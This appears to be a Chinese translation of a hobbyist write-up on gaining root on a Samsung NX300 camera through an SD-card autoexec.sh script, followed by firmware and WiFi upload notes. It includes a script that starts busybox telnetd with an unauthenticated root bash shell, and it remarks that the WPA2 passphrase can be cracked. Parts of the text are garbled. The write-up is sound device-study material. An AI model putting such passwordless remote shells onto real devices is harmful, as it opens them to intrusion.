卸载相机驱动，关掉再打开，等待几秒钟，再安装它，如果我们幸运的话可以很快看到测试结果。autoexec.log信息出现了！现在我们可以分析里面的内容了。
Fri May &9 06:25:20 UTC 2014
uid=0(root) gid=0(root)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:/sbin:/usr/local/bin:/usr/scripts
这个输出结果是刚刚出现的，并且以管理员权限运行的。
PID & & VSZ & RSS STAT &COMMAND
[stripped boring kernel threads and some columns]
& 1 & &2988 & &52 Ss & &init & & &
139 & 1 S & & /usr/bin/system_server
144 & &2652 & 188 Ss & &dbus-daemon &system
181 & &3416 & 772 Ss & &/usr/bin/power_manager
& & -r +accessx 0 -config /usr/etc/X11/xorg.conf -configdir /usr/etc/X11/xorg.conf.d
243 & &2988 & &76 Ss & &init & & &
244 & &2988 & &56 Ss & &init & & &
245 & &2988 & &60 Ss+ & init & & &
246 & &2988 & &56 Ss+ & init & & &
247 & &2988 & & 8 S & & sh /usr/etc/X11/xinitrc
256 & 2 S & & &\_ /usr/bin/enlightenment -profile samsung \
& & -i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it
254 & 19876 & & 8 S & & /usr/bin/launchpad_preloading_preinitializing_daemon
255 & 12648 & 816 S & & /usr/bin/ac_daemon
259 & &3600 & & 8 S & & dbus-launch &exit-with-session /usr/bin/enlightenment -profile samsung \
& & -i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it
260 & &2652 & & 8 Ss & &/usr/bin/dbus-daemon &fork &print-pid 5 &print-address 7 &session
267 &60 Ssl & di-camera-app-nx300
404 & &2988 & 520 S & & &\_ sh -c /mnt/mmc/autoexec.sh
405 & &2988 & 552 S & & & & &\_ /bin/sh /mnt/mmc/autoexec.sh
408 & &2860 & 996 R & & & & & & &\_ ps axfu
脚本程序（ di-camera-app-nx300）被创建后，此处显示了详细的信息。这个挂载点也十分正确，上面显示了UBIFS闪存文件系统以及sd卡上的FAT64分区。
rootfs on / type rootfs (rw)
ubi0!rootdir on / type ubifs (ro,relatime,bulk_read,no_chk_data_crc)
devtmpfs on /dev type devtmpfs (rw,relatime,size=47096k,nr_inodes=11774,mode=755)
none on /proc type proc (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /var/run type tmpfs (rw,relatime)
tmpfs on /var/lock type tmpfs (rw,relatime)
tmpfs on /var/tmp type tmpfs (rw,relatime)
tmpfs on /var/backups type tmpfs (rw,relatime)
tmpfs on /var/cache type tmpfs (rw,relatime)
tmpfs on /var/local type tmpfs (rw,relatime)
tmpfs on /var/log type tmpfs (rw,relatime)
tmpfs on /var/mail type tmpfs (rw,relatime)
tmpfs on /var/opt type tmpfs (rw,relatime)
tmpfs on /var/spool type tmpfs (rw,relatime)
tmpfs on /opt/var/log type tmpfs (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
/dev/ubi2_0 on /mnt/ubi2 type ubifs (ro,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/ubi1_0 on /mnt/ubi1 type ubifs (rw,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/mmcblk0 on /mnt/mmc type exfat (rw,nosuid,nodev,noatime,nodiratime,uid=5000,gid=6,fmask=0022,
& & & & dmask=0022,allow_utime=0020,codepage=cp437,iocharset=iso8859-1,namecase=0,errors=remount-ro)
当然当你加载第一个WiFi应用程序之前，默认情况下相机是处于没有连接WiFi的状态下。如果在家中可以测试邮件应用程序，当你启动应用程序，看起来相机正在搜索周围的网络（记得配置相机网络开关），并在这个步骤停留一段时间，保证与服务器连接是开放的（通过autoexec.sh）。在网上dropbear客户端（dropbear_rsa_host_key and authorized_keys），这就是我遇到的问题
[443] May 09 12:00:45 user &root& has blank password, rejected
运行 Telnet服务
在这个时候我意识到了一件事情，我首先应该检查
lrwxrwxrwx & &1 & &17 May 22 &2013 /usr/sbin/telnetd -& ../../bin/busybox
我们自带busybox，同时busybox可以配置telnetd，这样就可以轻松实现远程访问，这个结果和我预期是一样的
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147&
Connected to nx300.local.
Escape character is &^]&.
Connection closed by foreign host.
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147&
telnet: Unable to connect to remote host: Connection refused
telnet端口是开放的，某些程序正在运行但是我的程序崩溃了，在重新启动安装之后又出现了该问题
telnetd: can&t find free pty
但该问题的解决方案（点击我）是存在的，现在我们可以开始远程登录相机吧？
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147&
Connected to nx300.local.
Escape character is &^]&.
************************************************************
* & & & & & & & & SAMSUNG LINUX PLATFORM & & & & & & & & & *
************************************************************
nx300 login: root
Login incorrect
到了这一步不能登录了，也许我们可以使用方法绕过这个？没有有关busybox telnetd的任何提示信息？
&-l LOGIN & & & &Exec LOGIN on connect
也许我们可以利用shell脚本来解决登录密码这个问题？我们来更改sd卡中 autoexec.sh脚本程序来实现这一点？
mkdir -p /dev/pts
mount -t devpts none /dev/pts
telnetd -l /bin/bash -F & /mnt/mmc/telnetd.log 2&&1 &
在重新启动登录之后，进到系统里面了：
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147&
Connected to nx300.local.
Escape character is &^]&.
************************************************************
* & & & & & & & & SAMSUNG LINUX PLATFORM & & & & & & & & & *
************************************************************
nx300:/# cat /proc/cpuinfo
Processor & & & : ARMv7 Processor rev 8 (v7l)
BogoMIPS & & & &: 1395.91
Features & & & &: swp half thumb fastmult vfp edsp neon vfpv3 tls&
CPU implementer : 0&41
CPU architecture: 7
CPU variant & & : 0&2
CPU part & & & &: 0xc09
CPU revision & &: 8
Hardware & & & &: Samsung-DRIMeIV-NX300
Revision & & & &: 0000
Serial & & & & &: 0000
nx300:/# free
& & & & &total & & & used & & & free & & shared & &buffers & & cached
Mem: & & & &512092 & & 500600 & & &11492 & & & & &0 & & & &132 & & &41700
-/+ buffers/cache: & & 458768 & & &53324
Swap: & & & &30716 & & & 8084 & & &22632
nx300:/# df -h /
Filesystem & & & & & & & &Size & & &Used Available Use% Mounted on
ubi0!rootdir & & & & & &352.5M & &290.8M & & 61.6M &83% /
nx300:/# ls -al /opt/sd0/DCIM/100PHOTO/
total 1584
drwxr-xr-x & &2 root & & root & & & & & 520 May 22 &2013 .
drwxr-xr-x & &3 root & & root & & & & & 232 May 22 &2013 ..
-rwxr-xr-x & &1 root & & root & & & &394775 May 22 &2013 SAM_0015.JPG
-rwxr-xr-x & &1 root & & root & & & &335668 May 22 &2013 SAM_0016.JPG & [Obama was here]
-rwxr-xr-x & &1 root & & root & & & &357591 May 22 &2013 SAM_0017.JPG
-rwxr-xr-x & &1 root & & root & & & &291493 May 22 &2013 SAM_0018.JPG
-rwxr-xr-x & &1 root & & root & & & &232470 May 22 &2013 SAM_0019.JPG
到了这一步之后，你就获取到网络权限从Linux应用程序到达了这里，你可以在相机上操作更多的东西了。前面已经对远程控制做出了说明，到这里主要是对前面项目做一些整理以及补充。
三星NX300固件更新
固件版本1.41， X server 是关闭的，并且多了一个WiFi加密选项（wpa2）。
【V1.41 ]】
1、增加Wi-Fi隐私锁定功能
2、修改开源许可证
不幸的是，这个八位数的密码可以在1小时左右被GPU加速工具PYRIT，虽然没有较高的安全性，但这也取决于攻击者。三星在1.11版本之后的固件就已经将 autoexec.sh，但作者建议移回，认为这不是一个安全问题。
自动上传照片与备份
Markus A. Kuppe已经制作了一个教程关于NX300相机上传照片与备份的，主要利用相机上ftp客户端以及树莓派ftp服务器，值得注意的是在相机连接WiFi时候自动打开，利用 DBus以及wpa_supplicant.conf配置文件
cp /mnt/mmc/wpa_supplicant.conf /tmp/
/usr/bin/wlan.sh start NL 0&8210
/usr/sbin/connmand -W nl80211 -r
/usr/sbin/net-config
dbus-send &system &type=method_call &print-reply &dest=net.connman \
& & /net/connman/service/wifi_ab_c656d6d65_managed_psk \
& & net.connman.Service.Connect
Jonathan Dieter 做的备份程序（点击我）。
附加内核模块
Markus提供了额外的内核模块，可以允许我们扩展功能但又不用重刷固件。
Doug Hickok提出了一个方案，他修改了固件使用密匙加密照片，这个比较有趣如果一个摄影师或者记者想要保存照片就可以这样做。储存在sd卡的第一张图片就可以加密同时也可以删除，但
尽量不要在实际中使用，一旦失误操作是很悲剧的。
Samsung NX系列相机
Samsung NX系列相机基于Tizen（NX1、NX200、NX2000、NX300M等），作者给出了一些详细信息（点击我）。
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'